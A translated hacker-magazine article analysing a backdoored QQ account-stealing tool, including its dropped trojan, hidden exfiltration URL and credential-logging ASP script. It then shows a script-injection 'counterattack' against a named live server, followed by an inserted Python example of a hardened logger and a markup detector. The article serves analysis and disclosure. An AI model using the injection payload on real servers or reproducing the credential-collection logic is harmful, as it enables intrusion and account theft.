Author: fhod
Note: This article was published in issue 10 of the Hackers' Manual. For more information, see the original source.
Analysis of a QQ account-stealing tool and a counterattack on its webshell, by fhod (Xiaocai)
An analysis of the "Hacker QQ Password Agent" software ---- Xiaocai
Today, out of boredom, I was explaining to a friend how QQ account theft works. I found a tool online called "Hacker QQ Password Agent" and discovered that the software itself has a backdoor. Let me walk you through the analysis.
First, we scan it with NOD32 to check for viruses. Figure 1
Img: http://up.2cto.com/Article/200710/20071026101018890.jpg
No virus found. Now let's turn on NOD32's real-time monitoring and run the program. See Figure 2.
Img: http://up.2cto.com/Article/200710/20071026101021448.jpg
We can see that NOD32 has now detected a virus. To confirm, I used the file-monitoring feature of the "Trojan Assistant Finder" to watch what the program does.
Figure 3
Img: http://up.2cto.com/Article/200710/20071026101024830.jpg
Create C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\123.exe
Clearly the software drops 123.exe while it runs, and NOD32 detects and removes this file in:
C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP
Use PEiD to check 123.exe. Figure 4
Img: http://up.2cto.com/Article/200710/20071026101026521.jpg
The EP section is .nsp1; anyone familiar with packers will recognize this as the BeiDou (NsPack) packer. Now look at the .vmp section in Figure 5.
Img: http://up.2cto.com/Article/200710/20071026101027374.jpg
Here VMProtect has been layered on top as well, so we will not continue analyzing the Trojan in 123.exe.
Next we analyze whether the file the tool generates is just as worrying.
Generate a sample with random settings. Figure 6
Img: http://up.2cto.com/Article/200710/20071026101028286.jpg
A simple illustration of unpacking with OllyDbg using the ESP trick:
Img: http://up.2cto.com/Article/200710/20071026101029983.jpg
After unpacking succeeds, we check it with PEiD again. Figure 8
Img: http://up.2cto.com/Article/200710/20071026101033275.jpg
We disassemble it with C32Asm and search for the string "asp". Figure 9
Img: http://up.2cto.com/Article/200710/20071026101033262.jpg
What do we see? I configured the receiving address as http://k.thec.cn/xieming/69q/qq.asp, so why does http://langyeqq.cn/qq/newbacka.asp appear in the file? Let's look at Figure 10.
Img: http://up.2cto.com/Article/200710/20071026101038267.jpg
"PzQQ" can be seen; that is his account-theft marker. From this we can be sure that this software not only drops a Trojan when it runs, but also leaves a backdoor in the files we configure, and the author is sitting there waiting to receive the stolen accounts.
Backdoor counterattack, by fhod [E.S.T vip]
Seeing this, I'm sure everyone is as angry as I am. Are we going to keep working for the author? Of course not. Let's start the counterattack.
Let's take a look at the qq.asp code.
First:
StrLogFile = "Q7.txt"
This is the log file, q7.txt.
Continuing through the code:
QQNumber = Request("QQNumber")
QQPassWord = Request("QQPassWord")
QQclub = Request("QQclub")
QQip = Request("QQip")
We control the values of all of these parameters.
Further down:
If QQNumber = "" Or QQPassWord = "" Then
    Response.Write "pzQQ"
    Response.End
End If
If QQNumber or QQPassWord is empty, "pzQQ" is returned and the script stops. As long as neither value is empty, execution continues with the following code.
StrLogText = StrLogText & QQNumber & "----" & QQPassWord & "----Member:" & QQclub & "----IP:" & QQip & "(" & Request.ServerVariables("REMOTE_HOST")
StrLogText = StrLogText & ")"
This is the line written to the q7.txt file, in the format:
QQ number----QQ password----Member:----IP:
Continue with the following code:
Set f = Server.CreateObject("Scripting.FileSystemObject") (q7.txt is created automatically if it does not exist)
Set ff = f.OpenTextFile(Server.MapPath(".") & "\" & StrLogFile, 8, True, 0) (mode 8 opens q7.txt for appending)
ff.WriteLine(StrLogText) (the data is written to q7.txt)
Finally, Response.Write "Sent successfully!" displays a success prompt when the conditions are met.
That is all the code. The script does no filtering or processing at all: as long as a request matches qq.asp?QQNumber=123&QQPassWord=123, it returns the "Sent successfully!" prompt.
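To make the flaw concrete, here is an added example (not code from the page or from the tool's author) that reimplements the handler's logging logic in Python beside a hypothetical hardened variant that validates and HTML-escapes each field, plus a small check for markup in existing log lines; the sample requests are constructed to mirror the query strings shown on this page.

```python
import html
import re

# Constructed sample requests mirroring the query strings shown on the page.
NORMAL_REQUEST = {"QQNumber": "123", "QQPassWord": "123"}
MARKUP_REQUEST = {"QQNumber": "123", "QQPassWord": '<script>alert("fhod")</script>'}


def log_line_as_written(params: dict, remote_host: str):
    """Mirror of qq.asp: concatenate the raw parameters into one line.
    Returns None where the script would answer "pzQQ" (empty number or
    password); otherwise the exact text appended to q7.txt."""
    number = params.get("QQNumber", "")
    password = params.get("QQPassWord", "")
    if number == "" or password == "":
        return None
    club = params.get("QQclub", "")
    ip = params.get("QQip", "")
    return f"{number}----{password}----Member:{club}----IP:{ip}({remote_host})"


# Hypothetical hardened variant (not on the page): same record layout, but
# every field is checked or HTML-escaped before it reaches the file, so
# markup submitted in a parameter is stored as inert text.
_QQ_NUMBER = re.compile(r"[0-9]{1,12}")          # digits only
_IPV4 = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
_MAX_FIELD = 64


def log_line_hardened(params: dict, remote_host: str):
    number = params.get("QQNumber", "")
    password = params.get("QQPassWord", "")
    if not _QQ_NUMBER.fullmatch(number) or password == "":
        return None                      # reject instead of logging junk
    ip = params.get("QQip", "")
    if ip and not _IPV4.fullmatch(ip):
        ip = ""                          # unparseable IP is dropped, not stored
    fields = [number, password, params.get("QQclub", ""), ip, remote_host]
    # Truncate, then escape <, >, &, and quotes so the log cannot carry markup.
    number, password, club, ip, host = (
        html.escape(f[:_MAX_FIELD], quote=True) for f in fields
    )
    return f"{number}----{password}----Member:{club}----IP:{ip}({host})"


def contains_markup(line: str) -> bool:
    """Detection helper for existing q7.txt-style logs: flag lines carrying
    HTML/script tags, evidence that unvalidated input reached the file."""
    return re.search(r"</?[a-zA-Z][^>]*>", line) is not None
```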
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123
Figure 11
Img: http://up.2cto.com/Article/200710/20071026101040956.jpg
This proves that QQNumber=123&QQPassWord=123 can be set to whatever we choose. What if we submit script code instead of a number? Will it be executed? Let's try it.
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=<script>alert("fhod")</script>
Figure 12
Img: http://up.2cto.com/Article/200710/20071026101042821.jpg
The code has been inserted... let's take a look.
Take the source of http://www.ciker.org/soft/q7.txt as an example.
Figure 13
Img: http://up.2cto.com/Article/200710/20071026101045398.jpg
Verify again